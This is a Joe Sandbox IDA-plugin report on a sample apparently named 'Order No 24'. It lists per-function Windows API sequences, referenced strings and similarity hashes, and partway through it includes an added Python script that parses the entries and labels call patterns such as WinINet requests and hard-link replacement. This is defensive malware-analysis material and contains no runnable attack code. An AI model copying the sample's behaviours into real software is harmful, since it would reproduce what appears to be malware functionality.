                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                  • String ID: DllGetClassObject
                                                                                                                                  • API String ID: 753597075-1075368562
                                                                                                                                  • Opcode ID: 9e144845c18be2090e6d73f1550017400e617c252076da584bdefab428e27c48
                                                                                                                                  • Instruction ID: 0a02c2f47a44bb8743e2616b5575c41f3dbda136be6081f1c6a5ce4c960eead6
                                                                                                                                  • Opcode Fuzzy Hash: 9e144845c18be2090e6d73f1550017400e617c252076da584bdefab428e27c48
                                                                                                                                  • Instruction Fuzzy Hash: B4417E72A04208EFDB05CF94C884F9A7BB9EF84310F1484ADED099F256D7B5D945CBA1
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 009C5075
                                                                                                                                  • GetMenuItemInfoW.USER32 ref: 009C5091
                                                                                                                                  • DeleteMenu.USER32(00000004,00000007,00000000), ref: 009C50D7
                                                                                                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00A41708,00000000), ref: 009C5120
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 1173514356-4108050209
                                                                                                                                  • Opcode ID: f7a19c2f03de811391f0145221dbb993f716a712e8431407534f3d9634104e09
                                                                                                                                  • Instruction ID: da390705def5c80c32618c53f5097d149a817644fca3a3a5c972c21ad5b80e58
                                                                                                                                  • Opcode Fuzzy Hash: f7a19c2f03de811391f0145221dbb993f716a712e8431407534f3d9634104e09
                                                                                                                                  • Instruction Fuzzy Hash: ED41A071A087019FD720DF24D888F6ABBE8AFC5324F194A1EF89597291D730E940CB63
APIs
  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 009CE742
  • GetLastError.KERNEL32(?,00000000), ref: 009CE768
  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 009CE78D
  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 009CE7B9
Strings
Memory Dump Source
  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
  • API ID: CreateHardLink$DeleteErrorFileLast
  • String ID: p1#v`K$v
  • API String ID: 3321077145-1068180069
  • Opcode ID: 11710ba86c6022c83b3bacd9e97dbdd4d26478e8dd0c260a1429575a3ec702b0
  • Instruction ID: 5c498d69d615c0097820fc0fc3b303d99c151be107357307ebbf9d6021512742
  • Opcode Fuzzy Hash: 11710ba86c6022c83b3bacd9e97dbdd4d26478e8dd0c260a1429575a3ec702b0
  • Instruction Fuzzy Hash: 0C416539A00610DFCF15EF54C845A5DBBE5BF89720F088089E946AB3A2CB30FD01DB82
APIs
  • CharLowerBuffW.USER32(?,?,?,?), ref: 009E0587
Strings
Memory Dump Source
  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
  • API ID: BuffCharLower
  • String ID: cdecl$none$stdcall$winapi
  • API String ID: 2358735015-567219261
  • Opcode ID: eab75251361c5822486c1145320790f0bd986f2499c591f406b8351722d5a0d8
  • Instruction ID: d50866a20d1f1ba40c34f0656c4867f81149a9fd0c27facd635c445e21583abd
  • Opcode Fuzzy Hash: eab75251361c5822486c1145320790f0bd986f2499c591f406b8351722d5a0d8
  • Instruction Fuzzy Hash: 2131D470500656AFCF00EF58C841AAEB3B8FF95314B108629F466A73D1DB71E955CB50
APIs
  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 009BB88E
  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 009BB8A1
  • SendMessageW.USER32(?,00000189,?,00000000), ref: 009BB8D1
Strings
Memory Dump Source
  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
  • API ID: MessageSend
  • String ID: ComboBox$ListBox
  • API String ID: 3850602802-1403004172
  • Opcode ID: 973e5991b3740a3aa764692a7e903bc21b916179a74d600f21cbe2f7759fc68b
  • Instruction ID: c3852ba70a887ce04ef290cb3837ce9bdded209eb0ac39b98f9cec1c8aa9510a
  • Opcode Fuzzy Hash: 973e5991b3740a3aa764692a7e903bc21b916179a74d600f21cbe2f7759fc68b
  • Instruction Fuzzy Hash: 7021F3B6900108BFDB14ABB4D986EFE77BDEF85364F104529F021A72E1DBB44D069760
APIs
  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009D4401
  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009D4427
  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009D4457
  • InternetCloseHandle.WININET(00000000), ref: 009D449E
    • Part of subcall function 009D5052: GetLastError.KERNEL32(?,?,009D43CC,00000000,00000000,00000001), ref: 009D5067
Strings
Memory Dump Source
  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
  • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
  • String ID:
  • API String ID: 1951874230-3916222277
  • Opcode ID: f2b249215db9b9345804c7e6e4ad7f75e90cd64018bd61cedb60e422d6c0906f
  • Instruction ID: 2d1bae294b78ad341b04f7a5b4f274bc4f113eec7dfbe4fa142a34e8feb5dd27
  • Opcode Fuzzy Hash: f2b249215db9b9345804c7e6e4ad7f75e90cd64018bd61cedb60e422d6c0906f
  • Instruction Fuzzy Hash: 1D2180B2580208BFEB119F94CC85FBFB6ECEB88748F10C41BF109A2250DA748D469771
APIs
    • Part of subcall function 0099D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0099D1BA
    • Part of subcall function 0099D17C: GetStockObject.GDI32(00000011), ref: 0099D1CE
    • Part of subcall function 0099D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0099D1D8
  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 009E915C
  • LoadLibraryW.KERNEL32(?), ref: 009E9163
  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 009E9178
  • DestroyWindow.USER32(?), ref: 009E9180
Strings
Memory Dump Source
  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
  • String ID: SysAnimate32
  • API String ID: 4146253029-1011021900
  • Opcode ID: 0023c4bf8abc2cf9545722ec002fbe6bec0a740d72a41003177b1b4a428152e1
  • Instruction ID: 2a16ccfab4210ba2a3b7e2a05f4d5328a3d77432846187d832057a08c45280f7
  • Opcode Fuzzy Hash: 0023c4bf8abc2cf9545722ec002fbe6bec0a740d72a41003177b1b4a428152e1
  • Instruction Fuzzy Hash: C421A47120428ABBEF218FA6DC84FBB77ADFF99364F100618F91492190C772DC42A760
APIs
  • GetStdHandle.KERNEL32(0000000C), ref: 009C9588
  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009C95B9
  • GetStdHandle.KERNEL32(0000000C), ref: 009C95CB
  • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 009C9605
Strings
Memory Dump Source
  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
  • API ID: CreateHandle$FilePipe
  • String ID: nul
  • API String ID: 4209266947-2873401336
  • Opcode ID: dc75d67f00d2e3a20cb3430b185e5f71054e9aec5843c05073debe7e5950b799
  • Instruction ID: feb62f8babcfe1a3d0dbb06ab212f26700117e313bcf3e3c4f995e7e1c273be6
  • Opcode Fuzzy Hash: dc75d67f00d2e3a20cb3430b185e5f71054e9aec5843c05073debe7e5950b799
  • Instruction Fuzzy Hash: F0215171900249ABEB21AF69DC09F9A77E8AF89724F204A1DFDA1D72D0D770D942CB11
APIs
  • GetStdHandle.KERNEL32(000000F6), ref: 009C9653
  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009C9683
  • GetStdHandle.KERNEL32(000000F6), ref: 009C9694
  • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 009C96CE
Strings
Memory Dump Source
  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
  • API ID: CreateHandle$FilePipe
  • String ID: nul
  • API String ID: 4209266947-2873401336
  • Opcode ID: 271ef5ad392d20f6b12c6fc3f2e3a72a5459ab17e323cfd77cde94441712b3e6
  • Instruction ID: 9870036bc950161b89c69216ea27fdf083ee5691a1c0bd16f8e476188c7dc1ca
  • Opcode Fuzzy Hash: 271ef5ad392d20f6b12c6fc3f2e3a72a5459ab17e323cfd77cde94441712b3e6
  • Instruction Fuzzy Hash: E4215371D002059BDB209F699D49F9AB7ECAF95734F200A1DF8A1D72D0D770D942CB52
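The entries above are raw IDA-plugin output: per function, the imported API sequence, the strings it references, and hashes for similarity matching. The Python script below is an added example for turning such a listing into triage data; it is not Joe Sandbox's code and not code from the sample. It parses entries in the layout above, keeps direct calls apart from "Part of subcall function" lines, labels three of the sequences seen here (hard-link replacement, a WinINet request, pipe creation plus a handle on nul), and decodes the dwDesiredAccess argument of CreateFileW on nul (0x40000000 is GENERIC_WRITE, 0x80000000 is GENERIC_READ). The sample input is constructed from three of the entries above with the Memory Dump Source and hash lines left out; the pattern names are assumptions of this example, not report signatures.

```python
import re

# Constructed sample input: three entries copied in the layout of the listing
# above. Assumption: only the APIs lines and the String ID / Opcode ID fields are
# needed for triage, so the Memory Dump Source and hash lines are left out.
SAMPLE = """\
APIs
  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 009CE742
  • GetLastError.KERNEL32(?,00000000), ref: 009CE768
  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 009CE78D
  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 009CE7B9
Similarity
  • String ID: p1#v`K$v
  • Opcode ID: 11710ba86c6022c83b3bacd9e97dbdd4d26478e8dd0c260a1429575a3ec702b0
APIs
  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009D4401
  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009D4427
  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009D4457
  • InternetCloseHandle.WININET(00000000), ref: 009D449E
    • Part of subcall function 009D5052: GetLastError.KERNEL32(?,?,009D43CC,00000000,00000000,00000001), ref: 009D5067
Similarity
  • String ID:
  • Opcode ID: f2b249215db9b9345804c7e6e4ad7f75e90cd64018bd61cedb60e422d6c0906f
APIs
  • GetStdHandle.KERNEL32(0000000C), ref: 009C9588
  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009C95B9
  • GetStdHandle.KERNEL32(0000000C), ref: 009C95CB
  • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 009C9605
Similarity
  • String ID: nul
  • Opcode ID: dc75d67f00d2e3a20cb3430b185e5f71054e9aec5843c05073debe7e5950b799
"""

# One call line: optional "Part of subcall function XXXX:" prefix, then Name.MODULE(args), ref: addr.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>String ID|Opcode ID):\s*(?P<val>.*)$")
GENERIC_READ, GENERIC_WRITE = 0x80000000, 0x40000000  # CreateFileW dwDesiredAccess bits

# Triage labels are my own names (assumption), not Joe Sandbox signatures.
PATTERNS = {
    "hardlink_replace": ({"CreateHardLinkW", "DeleteFileW"}, None),
    "wininet_request": ({"InternetOpenUrlW", "HttpSendRequestW", "HttpQueryInfoW"}, None),
    "stdio_to_nul": ({"GetStdHandle", "CreatePipe", "CreateFileW"}, "nul"),
}


def parse_entries(text):
    """One entry per 'APIs' header; direct calls and subcall lines kept apart."""
    entries, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"calls": [], "subcalls": [], "fields": {}}
            entries.append(cur)
        elif cur is None:
            continue
        elif (m := API_RE.match(line)):
            call = {"api": m["api"], "module": m["mod"], "ref": int(m["ref"], 16),
                    "args": [a.strip() for a in m["args"].split(",")] if m["args"] else []}
            (cur["subcalls"] if m["sub"] else cur["calls"]).append(call)
        elif (f := FIELD_RE.match(line)):
            cur["fields"][f["key"]] = f["val"].strip()
    return entries


def match_patterns(entry):
    """PATTERNS whose APIs (and required string) all occur in the direct calls;
    subcalls are ignored so a helper's GetLastError does not pollute a match."""
    apis = {c["api"] for c in entry["calls"]}
    strings = set(entry["fields"].get("String ID", "").split("$"))
    return sorted(name for name, (need, s) in PATTERNS.items()
                  if need <= apis and (s is None or s in strings))


def nul_direction(entry):
    """Decode dwDesiredAccess of a CreateFileW on 'nul': GENERIC_WRITE means
    output is being discarded into nul, GENERIC_READ means input is read from it."""
    for c in entry["calls"]:
        if c["api"] == "CreateFileW" and c["args"][:1] == ["nul"]:
            access = int(c["args"][1], 16)
            return "write" if access & GENERIC_WRITE else "read" if access & GENERIC_READ else "none"
    return None


def triage(text):
    """Per entry: short Opcode ID, direct-call sequence, pattern hits, nul direction."""
    return [{"opcode": e["fields"].get("Opcode ID", "")[:8],
             "sequence": [c["api"] for c in e["calls"]],
             "hits": match_patterns(e), "nul": nul_direction(e)}
            for e in parse_entries(text)]


if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row["opcode"], " -> ".join(row["sequence"]), row["hits"], row["nul"])
```

The argument strings are kept raw on purpose: a value such as the 00000005 passed to HttpQueryInfoW (HTTP_QUERY_CONTENT_LENGTH) only becomes meaningful once looked up, and a parse that discarded it would hide what the request is for. Note also that the two nul entries above share API String ID 4209266947-2873401336 while their Opcode IDs differ: the same call pattern compiled twice, once with GENERIC_WRITE and once with GENERIC_READ, which is why API String ID rather than Opcode ID is the better key when hunting for variants of one pattern across reports.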
APIs
• SetErrorMode.KERNEL32(00000001), ref: 009CDB0A
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 009CDB5E
• __swprintf.LIBCMT ref: 009CDB77
• SetErrorMode.KERNEL32(00000000,00000001,00000000,00A1DC00), ref: 009CDBB5
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: ErrorMode$InformationVolume__swprintf
• String ID: %lu
• API String ID: 3164766367-685833217
• Opcode ID: e41b8a13d9031bf158da785abf0b38543cd33bd9f84098290912d401965c9d80
• Instruction ID: 1e040e915f589b73e7c5c4a1cfdea6e723b9fffac5eac91022cedbb5b628065f
• Opcode Fuzzy Hash: e41b8a13d9031bf158da785abf0b38543cd33bd9f84098290912d401965c9d80
• Instruction Fuzzy Hash: 26215375A00108AFCB10EFA5CD85EEEBBB8EF89704B104069F509D7351DB71EA41CB61
APIs
  • Part of subcall function 009BC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 009BC84A
  • Part of subcall function 009BC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 009BC85D
  • Part of subcall function 009BC82D: GetCurrentThreadId.KERNEL32 ref: 009BC864
  • Part of subcall function 009BC82D: AttachThreadInput.USER32(00000000), ref: 009BC86B
• GetFocus.USER32 ref: 009BCA05
  • Part of subcall function 009BC876: GetParent.USER32(?), ref: 009BC884
• GetClassNameW.USER32(?,?,00000100), ref: 009BCA4E
• EnumChildWindows.USER32(?,009BCAC4), ref: 009BCA76
• __swprintf.LIBCMT ref: 009BCA90
Strings
Similarity
• API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
• String ID: %s%d
• API String ID: 3187004680-1110647743
• Opcode ID: 671086def58174e445845a9b2f3e4f4766cdc0c3364c940e79097bb85facae13
• Instruction ID: 4500958e826c662154741745d07cee27d9a1ea8fad191c5ebb08bcaf282dfc5e
• Opcode Fuzzy Hash: 671086def58174e445845a9b2f3e4f4766cdc0c3364c940e79097bb85facae13
• Instruction Fuzzy Hash: 291193B56002097BCF11FFA08D85FEA3B7DAF84724F008466FE08AA182DB709546DB70
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 009E19F3
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 009E1A26
• GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 009E1B49
• CloseHandle.KERNEL32(?), ref: 009E1BBF
Similarity
• API ID: Process$CloseCountersHandleInfoMemoryOpen
• String ID:
• API String ID: 2364364464-0
• Opcode ID: bef4c3d35702a298af4be6f2f49df4ef1cacaa860770b55c5a492108c858a98c
• Instruction ID: 7cc95a040f29188889a63b682c097a109ee32ec306ef2e15587752cf3141fc97
• Opcode Fuzzy Hash: bef4c3d35702a298af4be6f2f49df4ef1cacaa860770b55c5a492108c858a98c
• Instruction Fuzzy Hash: 2E818371600205ABDF11EF65C886BADBBE5BF48720F148459F905AF382D7B4ED418B90
APIs
• SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 009EE1D5
• SendMessageW.USER32(?,000000B0,?,?), ref: 009EE20D
• IsDlgButtonChecked.USER32(?,00000001), ref: 009EE248
• GetWindowLongW.USER32(?,000000EC), ref: 009EE269
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 009EE281
Similarity
• API ID: MessageSend$ButtonCheckedLongWindow
• String ID:
• API String ID: 3188977179-0
• Opcode ID: 0f4ecbe36feb3a23ffd0363321b8619f62b170f1c3ccdeb0ba854e7f112355e3
• Instruction ID: d5529e703e8525c5a1bd3707950c7c539b8b3c4bfa8f38185e21b568bc7d14eb
• Opcode Fuzzy Hash: 0f4ecbe36feb3a23ffd0363321b8619f62b170f1c3ccdeb0ba854e7f112355e3
• Instruction Fuzzy Hash: 4661B538A08284AFDB22DF55CC94FAAB7BEEF89300F044059F959973A1C775AD81CB11
APIs
• VariantInit.OLEAUT32(?), ref: 009C1CB4
• VariantClear.OLEAUT32(00000013), ref: 009C1D26
• VariantClear.OLEAUT32(00000000), ref: 009C1D81
• VariantClear.OLEAUT32(?), ref: 009C1DF8
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 009C1E26
Similarity
• API ID: Variant$Clear$ChangeInitType
• String ID:
• API String ID: 4136290138-0
• Opcode ID: d2af43232513f971be8c6ecc12a32d49f7cf7bf301128baf258d68dfc91f609e
• Instruction ID: ea84f6df51e11a806963327a80d8e5e1a54b8f2869d33551fd063c020ba45a75
• Opcode Fuzzy Hash: d2af43232513f971be8c6ecc12a32d49f7cf7bf301128baf258d68dfc91f609e
• Instruction Fuzzy Hash: C55149B5A00209EFDB14CF58C880EAAB7B8FF4D314B158559E95ADB341D330EA52CFA5
APIs
  • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
  • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
• LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 009E06EE
• GetProcAddress.KERNEL32(00000000,?), ref: 009E077D
• GetProcAddress.KERNEL32(00000000,00000000), ref: 009E079B
• GetProcAddress.KERNEL32(00000000,?), ref: 009E07E1
• FreeLibrary.KERNEL32(00000000,00000004), ref: 009E07FB
  • Part of subcall function 0099E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,009CA574,?,?,00000000,00000008), ref: 0099E675
  • Part of subcall function 0099E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,009CA574,?,?,00000000,00000008), ref: 0099E699
Similarity
• API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
• String ID:
• API String ID: 327935632-0
• Opcode ID: 585277d7ffb14e53e83d403635b6b833e0f53f452524a4880e7aa2ed608fabc2
• Instruction ID: 7ada7dd49eaf98b4d75661e7a3adadcfdf3cb313813a53b905267eb826c5b7d3
• Opcode Fuzzy Hash: 585277d7ffb14e53e83d403635b6b833e0f53f452524a4880e7aa2ed608fabc2
• Instruction Fuzzy Hash: 52514B75A00249DFCB01EFA8C885EADB7B5BF98310F04805AE915AB352DB75ED46CF90
APIs
  • Part of subcall function 009E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009E2BB5,?,?), ref: 009E3C1D
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009E2EEF
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009E2F2E
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 009E2F75
• RegCloseKey.ADVAPI32(?,?), ref: 009E2FA1
• RegCloseKey.ADVAPI32(00000000), ref: 009E2FAE
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpper
• String ID:
• API String ID: 3740051246-0
• Opcode ID: 8517052be045454cc5d1a7f35271f98e45e9f89ca4fe5afee5680bb55a50a45b
• Instruction ID: b75f208ed463a3d5a14d4805f7dc4c259ac06b9de190efe0b53643e3e64b8aec
• Opcode Fuzzy Hash: 8517052be045454cc5d1a7f35271f98e45e9f89ca4fe5afee5680bb55a50a45b
• Instruction Fuzzy Hash: D3515972608244AFD705EFA5C891F6ABBF8BF88304F04881DF59697291DB70ED05CB52
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  APIs
                                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 009D12B4
                                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 009D12DD
                                                                                                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 009D131C
                                                                                                                                    • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                                                                                                                    • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 009D1341
